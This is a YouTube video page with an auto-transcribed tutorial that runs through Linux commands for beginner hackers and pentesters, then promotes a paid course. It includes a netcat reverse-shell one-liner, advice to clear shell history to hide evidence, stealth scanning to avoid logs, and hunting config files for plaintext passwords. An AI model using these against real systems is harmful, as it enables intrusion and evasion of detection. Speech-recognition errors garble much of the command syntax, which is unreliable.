---
video_title: "69 Linux Commands You MUST Know (in 6-7 minutes)"
video_id: QG0113W-THw
channel_name: "CyberFlow"
channel_id: UCUvkPEm38w6pq8w5QYgtPPw
channel_category: "Education"
url: https://www.youtube.com/watch?v=QG0113W-THw
video_date: 2025-12-01T14:30:20+00:00
video_description: |
  Join The Family 💻👩🏻‍💻
  https://cyberflow-academy.framer.website/
  Check Out The Courses We Offer:
  https://cyberflow-academy.framer.website/courses
  
  Educational Purposes Only.
  
  69 essential Linux commands every hacker, pentester, and cybersecurity beginner needs to know. This video is a fast, no-BS crash course built to help you learn Linux commands quickly, understand how each command works, and instantly apply them in real hacking and cybersecurity scenarios.
  
  If you're studying bug bounty, ethical hacking, CTFs, or simply improving your terminal skills, these Linux commands cover everything: recon, enumeration, privilege escalation, networking, file manipulation, automation, malware analysis, system monitoring, and everyday Linux usage.
  
  This is basically your compressed Linux command cheat sheet focused on the exact Linux commands real hackers use, not theoretical fluff. If you want to level up your speed, confidence, and efficiency in the terminal, mastering these Linux commands will change your entire workflow.
  
  🧠 Topics Covered:
  
   Basic Linux commands every beginner must know
   Essential Linux commands for ethical hacking
   Linux file system navigation & file manipulation
   Networking & system information commands
   Process monitoring & system management
   Privilege escalation Linux commands
   Linux enumeration for bug bounty & pentesting
   Terminal shortcuts & productivity boosters
   Automation commands using pipes, filters & scripting
   Real hacker workflows on Linux
   Linux commands used in CTF competitions
   Commands for reconnaissance & scanning
   Linux command-line tools for cybersecurity
   Practical Linux tips to get faster in the terminal
  
  📚 Resources Mentioned
  
  GNU Coreutils Manual – https://www.gnu.org/software/coreutils/manual/
  Linux Command Library – https://linuxcommandlibrary.com/
  HackTricks Linux PrivEsc – https://book.hacktricks.xyz/linux-hardening/privilege-escalation
  
  #hacking #ethicalhacking #bugbounty #cybersecurity #hacker #pentesting #infosec #cyberattack #hackingtools #linuxcommands #linuxbasics #linuxforbeginners #terminal #cyberflowsacademy
  
  → Email: cyberflow10@gmail.com
  
  Tags:
  linux commands for hackers, essential linux commands, linux for hacking, hacker linux tutorial, pentesting linux commands, cybersecurity linux basics, linux commands explained, linux privilege escalation commands, ethical hacking linux, hacking in linux, how to learn linux fast, linux terminal commands, linux for beginners, hacker workflow linux, bug bounty linux tools, linux command cheat sheet, linux guide for hackers, linux enumeration commands, linux command shortcuts, cyberflow academy
  
  I believe in you. You can do it. 🖤
  .▀█▀.█▄█.█▀█.█▄.█.█▄▀　█▄█.█▀█.█─█
  ─.█.─█▀█.█▀█.█.▀█.█▀▄　─█.─█▄█.█▄█
---
69 Linux commands. And yes, I picked that number on purpose because if you're not having fun while LEARNING TO HACK, >> WHAT THE [ __ ] WHAT THE [ __ ] IS WRONG WITH YOU? [screaming] WHAT THE [ __ ] IS WRONG WITH YOU? >> You're doing it wrong. Here's the deal.

I'm about to blast through every command that actually matters for penetration testing. And if you already know all 69 of these commands, you can close this video right now and go touch grass. But if you're still clicking around in Kali Linux menus like it's Windows XP or googling basic commands every five minutes then buckle up because I'm giving you the entire arsenal in around 6 7 minutes >> six seven >> And before we get started if you want to actually learn this stuff properly with real labs and step-by-step courses join our private community first link in the description. More on that later. Let's start with the obvious one. N MAPAP is

your best friend for network scanning. Use NMAP- SSV- A for version and operating system detection or NMAP- SS for stealth scanning because leaving logs everywhere is amateur hour. Want to scan all ports? Use n mapap- dash because hackers don't limit themselves to the top 1,000 common ports like some kind of script kitty. Ping checks if hosts are alive. Just ping- c4 followed

by your target. Tracer route maps the network path showing you every hop between you and the target which is great for identifying firewalls and security appliances. Dig queries DNS records and dig domain any dumps everything including that forgotten subdomain running an outdated CMS from 2015. NSOup also does DNS lookups but dig is better so use dig. Host does reverse DNS lookups turning IP addresses back into domain names. Who is tells you

who owns a domain and when you see their entire tech stack leak in the registration data, you'll understand why reconnaissance matters. Netstat shows active network connections and listening ports with netstat- tulpn. The modern replacement is ss which does the same thing but faster. So use ss-tn on newer systems. Now let's talk about actually navigating and manipulating files because you can't hack what you can't find. ls lists directory contents

and ls-lha shows everything including hidden files and permissions which is where the good stuff lives. Find locates files anywhere on the system like find/namestar.com to find every configuration file that probably has passwords in plain text. Locate is faster because it uses a database. Just type locate file name and boom, instant results. Cat displays file

contents. Head shows the first 10 lines with head-N. Tail shows the last lines and tail-f follows files in real time, which is perfect for monitoring logs while your exploit runs. Less lets you scroll through files, and more does the same thing, but worse. So, just use less.

Touch creates empty files or updates timestamps. MKDIR makes directories, and MKDIR-P creates nested directories all at once. RM deletes files, and RM-rf deletes everything recursively and permanently, which has destroyed more systems than ransomware. So, be careful. CP copies files. MD moves or renames

files. Chmod changes file permissions like chmod 600 to make files readable only by the owner. GP searches for patterns and files. And GP-R searches recursively through entire directories. Egrep uses extended reax for finding complex patterns like credit card numbers and log files, which happens more often than companies admit. Cut

extracts specific columns with cut-dime. Sort alphabetizes output. Unique removes duplicate lines. File identifies file types regardless of extension because hackers rename executables to image.jpg and file sees through that instantly. PS

shows running processes with psuax listing everything on the system. Top monitors real-time resource usage. HTOP is the prettier version that doesn't make your eyes bleed from terrible formatting. Kill terminates processes and kill-94 kills when things won't die gracefully. Pill kills processes by name, which is way easier than finding the process ID first. Netcat is the

Swiss Army knife of networking. Use nc-lvp4444 to open a listening port or NC target 444-e/bin/bash for a reverse shell, assuming they have zero monitoring, which they probably don't. Wget downloads files with wget URL and wget-r recursively downloads entire websites. Curl transfers data with curl URL to fetch content or curl- post-data to send API requests. SSH connects remotely with SSH user at target. FTP and SFTP transfer files with

FTP target for unencrypted connections and SFTP user at target for encrypted transfers. Sudo runs commands as root with sudo command and pseudo-l lists what you can run without passwords which is your privilege escalation checklist. You switches users with su-root if you have the password. User ad creates user accounts. User Dell deletes them. Group

ad creates groups for permission management. Systemct ctl manages services on newer systems with systemctl start service. Service does the same thing on older systems. DF shows disk space with DF-H in human readable format. DU shows directory sizes with DU-SH. Als lists all block devices

showing drives and partitions. FISK manages partition tables. Stat displays detailed file information, including timestamps and permissions. pwd prints your current working directory. CD changes directories. History shows your

command history, which is a record of everything you've done. History- C clears it because leaving evidence is stupid. Env shows environment variables. Print end also displays environment settings. Source executes scripts in the current shell with source script.sh for

convenience. If you like the way I break this stuff down and you actually want to learn hacking the right way, then check out Cyberflow's Academy, my private community. Inside you get full step-by-step courses on ethical hacking, bug bounty, web hacking, osent, Python, C++, and reverse engineering, plus a private Discord where you can ask me anything and learn alongside people already getting insane payouts. You also get all my cyber docs, the cheat sheets, workflows, recon templates, osent checklists, exploit notes, and practical challengebased labs that actually force you to apply the skills, plus the $1,000 playbook that shows you how to make your first grand from hacking. And we include all my tools and setups so your machine is ready from day one. If you want all

that, courses, labs, playbooks, everything, it's in the first link in the description. See you inside.